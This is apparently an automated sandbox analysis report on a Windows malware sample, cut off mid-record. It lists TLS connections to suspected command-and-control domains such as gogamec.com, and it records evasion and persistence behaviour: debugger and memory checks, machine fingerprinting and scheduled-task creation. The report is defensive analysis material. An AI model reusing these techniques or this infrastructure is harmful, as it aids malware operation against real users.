TLSv1 192.168.56.103:49233 104.21.72.228:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamef.com	5c:36:e8:6e:6d:65:76:95:76:a5:7d:b3:47:fe:54:fe:f3:71:15:1b
TLSv1 192.168.56.103:49202 162.159.133.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.103:49193 34.117.59.81:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1D4	CN=ipinfo.io	f0:42:a0:3b:5b:a8:0e:51:f4:13:25:f7:fc:7c:dc:35:63:19:75:63
TLSv1 192.168.56.103:49245 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49251 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49258 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49254 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49256 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49262 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49270 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49271 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49278 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49273 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49283 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49298 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49292 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49300 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49297 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49304 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49305 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49308 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49224 162.159.133.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.103:49317 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49253 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49257 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49269 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49274 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49232 172.67.185.110:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	b0:c4:b1:fe:56:fd:ec:99:f4:dc:0f:3f:36:63:53:f7:6c:3a:26:7b
TLSv1 192.168.56.103:49284 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49286 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49289 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49299 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49301 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49255 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49306 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49261 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49264 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49315 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49275 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49279 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49259 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49280 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49281 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49282 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49291 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49263 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49293 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49295 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49266 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49302 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49307 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49309 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49272 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49321 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49323 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49324 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49277 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49285 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49288 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49294 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49303 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49260 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49265 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49310 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49267 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49276 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49312 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49287 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49296 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49313 52.219.66.59:443	C=US, O=Amazon, OU=Server CA 1B, CN=Amazon	CN=*.s3.ap-south-1.amazonaws.com	c6:36:df:af:09:de:c1:11:cd:93:7d:ef:05:10:32:ae:12:cd:7d:b8
TLSv1 192.168.56.103:49325 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49314 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49326 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1

Queries for the computername (3 events)

Time & API	Arguments	Status	Return
GetComputerNameW Nov. 4, 2021, 2:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 2:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 4, 2021, 2:45 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Nov. 4, 2021, 2:45 p.m.			0	0
IsDebuggerPresent Nov. 4, 2021, 2:45 p.m.			0	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Nov. 4, 2021, 2:44 p.m.	buffer: SUCCESS: The scheduled task "PowerControl HR" has successfully been created. console_handle: 0x00000007	1	1	0
WriteConsoleW Nov. 4, 2021, 2:44 p.m.	buffer: SUCCESS: The scheduled task "PowerControl LG" has successfully been created. console_handle: 0x00000007	1	1	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 4, 2021, 2:43 p.m.		1	1	0

One or more processes crashed (16 events)

Time & API	Arguments	Status
__exception__ Nov. 4, 2021, 2:43 p.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73b34f99 0x387c6ed 0x387c79a 0x387c808 0x37f0a09 0x37f1cba 0x37f1290 0x37f15cd 0x3808939 0x383d9d7 0x383ddeb 0x389f571 0x389f654 ww_testll_0211_single+0x3eb9 @ 0x913eb9 ww_testll_0211_single+0x8eb1 @ 0x918eb1 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73b334b2 registers.esp: 34726308 registers.edi: 0 registers.eax: 0 registers.ebp: 34726348 registers.edx: 32 registers.ebx: 34726652 registers.esi: 0 registers.ecx: 5939176	1
__exception__ Nov. 4, 2021, 2:43 p.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73b34f99 0x387c6ed 0x387c79a 0x387c808 0x37f0a09 0x37f1cba 0x37f129e 0x37f15cd 0x3808939 0x383d9d7 0x383ddeb 0x389f571 0x389f654 ww_testll_0211_single+0x3eb9 @ 0x913eb9 ww_testll_0211_single+0x8eb1 @ 0x918eb1 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73b334b2 registers.esp: 34726308 registers.edi: 0 registers.eax: 0 registers.ebp: 34726348 registers.edx: 32 registers.ebx: 34726652 registers.esi: 0 registers.ecx: 5939176	1
__exception__ Nov. 4, 2021, 2:43 p.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73b34f99 0x387c6ed 0x387c79a 0x387c808 0x37f0a09 0x37f1cba 0x37f1290 0x37f15cd 0x3808939 0x3809831 0x3836065 0x3836d41 0x383dbbe 0x383ddeb 0x389f571 0x389f654 ww_testll_0211_single+0x3eb9 @ 0x913eb9 ww_testll_0211_single+0x8eb1 @ 0x918eb1 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73b334b2 registers.esp: 34720340 registers.edi: 0 registers.eax: 0 registers.ebp: 34720380 registers.edx: 32 registers.ebx: 34720684 registers.esi: 0 registers.ecx: 5938376	1
__exception__ Nov. 4, 2021, 2:43 p.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73b34f99 0x387c6ed 0x387c79a 0x387c808 0x37f0a09 0x37f1cba 0x37f129e 0x37f15cd 0x3808939 0x3809831 0x3836065 0x3836d41 0x383dbbe 0x383ddeb 0x389f571 0x389f654 ww_testll_0211_single+0x3eb9 @ 0x913eb9 ww_testll_0211_single+0x8eb1 @ 0x918eb1 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73b334b2 registers.esp: 34720340 registers.edi: 0 registers.eax: 0 registers.ebp: 34720380 registers.edx: 32 registers.ebx: 34720684 registers.esi: 0 registers.ecx: 5938376	1
__exception__ Nov. 4, 2021, 2:43 p.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73b34f99 0x387c6ed 0x387c79a 0x387c808 0x37f0a09 0x37f1cba 0x37f1290 0x37f15cd 0x3808939 0x3809095 0x3836eb3 0x383dbbe 0x383ddeb 0x389f571 0x389f654 ww_testll_0211_single+0x3eb9 @ 0x913eb9 ww_testll_0211_single+0x8eb1 @ 0x918eb1 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73b334b2 registers.esp: 34720756 registers.edi: 0 registers.eax: 0 registers.ebp: 34720796 registers.edx: 32 registers.ebx: 34721100 registers.esi: 0 registers.ecx: 5431552	1
__exception__ Nov. 4, 2021, 2:43 p.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73b34f99 0x387c6ed 0x387c79a 0x387c808 0x37f0a09 0x37f1cba 0x37f129e 0x37f15cd 0x3808939 0x3809095 0x3836eb3 0x383dbbe 0x383ddeb 0x389f571 0x389f654 ww_testll_0211_single+0x3eb9 @ 0x913eb9 ww_testll_0211_single+0x8eb1 @ 0x918eb1 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73b334b2 registers.esp: 34720756 registers.edi: 0 registers.eax: 0 registers.ebp: 34720796 registers.edx: 32 registers.ebx: 34721100 registers.esi: 0 registers.ecx: 5431552	1
__exception__ Nov. 4, 2021, 2:44 p.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73b34f99 0x387c6ed 0x387c79a 0x387c808 0x37f0a09 0x37f1cba 0x37f1290 0x37f15cd 0x3808939 0x38319c1 0x383b898 0x383dbbe 0x383ddeb 0x389f571 0x389f654 ww_testll_0211_single+0x3eb9 @ 0x913eb9 ww_testll_0211_single+0x8eb1 @ 0x918eb1 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73b334b2 registers.esp: 34715812 registers.edi: 0 registers.eax: 0 registers.ebp: 34715852 registers.edx: 32 registers.ebx: 34716156 registers.esi: 0 registers.ecx: 6123544	1
__exception__ Nov. 4, 2021, 2:44 p.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73b34f99 0x387c6ed 0x387c79a 0x387c808 0x37f0a09 0x37f1cba 0x37f129e 0x37f15cd 0x3808939 0x38319c1 0x383b898 0x383dbbe 0x383ddeb 0x389f571 0x389f654 ww_testll_0211_single+0x3eb9 @ 0x913eb9 ww_testll_0211_single+0x8eb1 @ 0x918eb1 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73b334b2 registers.esp: 34715812 registers.edi: 0 registers.eax: 0 registers.ebp: 34715852 registers.edx: 32 registers.ebx: 34716156 registers.esi: 0 registers.ecx: 6123544	1
__exception__ Nov. 4, 2021, 2:44 p.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73b34f99 0x387c6ed 0x387c79a 0x387c808 0x37f0a09 0x37f1cba 0x37f1290 0x37f15cd 0x3808939 0x3833fe8 0x383b898 0x383dbbe 0x383ddeb 0x389f571 0x389f654 ww_testll_0211_single+0x3eb9 @ 0x913eb9 ww_testll_0211_single+0x8eb1 @ 0x918eb1 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73b334b2 